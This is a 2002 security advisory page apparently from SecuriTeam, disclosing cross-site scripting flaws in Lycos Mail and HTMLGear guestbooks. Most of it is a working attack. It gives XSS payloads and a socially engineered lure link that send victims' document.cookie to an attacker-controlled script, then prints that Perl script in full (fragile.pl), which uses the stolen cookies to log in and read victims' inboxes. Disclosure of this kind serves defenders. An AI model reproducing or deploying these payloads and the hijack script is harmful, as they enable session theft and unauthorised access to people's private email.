Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Lycos Mail and Lycos HTMLGear XSS/Cookie Problems Advisory 6 Nov. 2002    Summary Lycos Mail is a full featured web-based email solution. Lycos Mail now offers two levels of email service, a standard FREE version and a NEW Lycos Mail Plus option for the more demanding user. Professional Gears eliminate ALL ads and HTML Gear branding and give you the freedom to integrate Gears more seamlessly on your site. Both sites (Lycos Mail and HTMLGear) have been found to contain multiple XSS vulnerabilities.   Credit: The information has been provided by N|ghtHawk. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner 'Matthew Murphy' found on Sept 14 2002 some bugs in the HTMLGear Guestbook, which can be viewed on: Lycos HTMLGear Guestbook Script Injection Vulnerability. Besides those bugs, the HTMLGear got also a XSS in 'control.guest' on the lycos.com server. Both bugs can be used to get the cookies from users of the site. The real problem in this is that through this way people their lycosmail cookies can be captured. This can be done when people use the "Save User Name & Password" option when login in and don't log out. Closing the browser wil not log them out. With the cookie of a lycosmail user, people can have access to their mailbox. Exploit: Inject JavaScript into the HTMLGear of none patched/bad filtered guest books:  - <IMG SRC="javascript:window.open('http://host/cgi-bin/fragile.pl?'%2Bdocument.cookie);">  - <IMG SRC="http://a.a/a" onerror="poof:window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);">  - <IMG SRC="http://ly.lygo.com/ly/0/hp/dog.gif" onload="poof:window.open('http://host/cgi-bin/fragile.pl?'+document.cookie);"> Or let people click on the next URL:  - http://htmlgear.lycos.com/guest/control.guest?u=poof&a="><scr!pt>window.open('http://host/cgi-bin/fragile.pl?'%2Bdocument.cookie)%3B</script> This can be done by letting people click on a link, which you can mail them:  - <a href="http://htmlgear.lycos.com/guest/control.guest?u=poof&a=%22%3E%3Cscript%3Ewindow.open('http://host/cgi-bin/fragile.pl?'%252Bdocument.cookie)%3C/script%3E">Britney Nude!</a> All will connect with a perl script (fragile.pl), this script will take the cookie, and make a connection to lycos.com to login on the mail server using the cookie. Then it will request the inbox or the front page of the mailbox of the user. With the third option in the exploit it just captures the cookies and writes them in a file together with the email address. This is just a proof of concept you could also change it to let it read mail. Please don't email me with request to write that. Fragile.pl: #!/usr/bin/perl -w # # Lycos.com XSS/Cookie Problems # N|ghtHawk # nighthawk_at_hackers4hackers.org use IO::Socket; # OPTIONS # 1. See Mail Frontpage # 2. See Inbox # 3. Only save Cookie $option = 2; # PATH $path = "/tmp/"; $cookie = "$ENV{QUERY_STRING}\;"; $cookie =~ s/%20/ /g; if ($cookie !~ "MAYA") {   &no_cookie; } $ip = "209.202.220.97"; $host = "login.mail.lycos.com"; $req = "\/?callback\=http:\/\/inbox.mail.lycos.com\/jumpPage.shtml"; $data = request($ip, $host, $req); @datar = split(/\n/,$data); foreach $line (@datar) {   if ($line =~ /[Cc]ookie: *(.*)\; *.*\;/) {     $line = $1;     if ($line !~ "L_LOC") {       $cookie .= " $line\;";     } else {       $cookie .= " $line";     }   } elsif ($line =~ /Location: *http\:\/\/inbox.mail.lycos.com(.*)/) {     $req = $1;   } } if ($option == 1 || $option == 3) {   $ip = "209.202.220.100";   $host = "inbox.mail.lycos.com";   $data = request($ip, $host, $req);   out($data); } if ($option == 2) {   $ip = "209.202.220.97";   $host = "login.mail.lycos.com";   $req = "\/bounce.shtml?goto=folder&folderId=!1inbox&user=&count=1";   $data = request($ip, $host, $req);   @datar = split(/\n/,$data);   foreach $line (@datar) {     if ($line =~ /Location: *http:\/\/(.*com)(\/.*)/) {       $host = $1;       $req = $2;     }   }   $data = request($host,$host,$req);   out($data); } sub out {   my ($data) = @_;   @datar = split(/\n/,$data);   foreach $line (@datar) {     if ($line =~ /<b>Hello, * (.+\@lycos.com)<\/b>/) {       $name = $1;     }   }   if ($option == 3) {     $data = "$name\n$cookie\n";     $name = "cookies";   }   open(FILE,">$path$name.html");   print FILE "$data\n";   close(FILE);   print "Content-type: text/html\n";   print "Location: http://www.dwheeler.com/secure-programs".         "/Secure-Programs-HOWTO.html\n\n"; } sub request {   my ($ip, $host, $req) = @_;   $sock = IO::Socket::INET->new(   Proto => "tcp",   PeerAddr => "$ip",   PeerPort => "80",   Timeout => 30) || die "Could not create socket: $!\n";   print $sock "GET $req HTTP/1.0\n".   "Host: $host\n".   "Accept: image/gif, image/x-xbitmap, */*\n".   "Accept-Language: nl\n".   "User-Agent: Pr00fOfConcept/1.0 \n".   "Connection: Keep-Alive\n".   "Cookie: $cookie\n\n";   sleep(2);   recv($sock,$data,200000,0);   close($sock);   return $data; } sub no_cookie {   print "content-type: text/html\n\n";   print "<h1>No Lycos Mail Cookie found</h1>\n";   exit; } Vender Response: No vendor response has been received at the time or releasing this advisory.  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability Apple QuickTime FLC Delta Decompression Code Execution Vulnerability Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®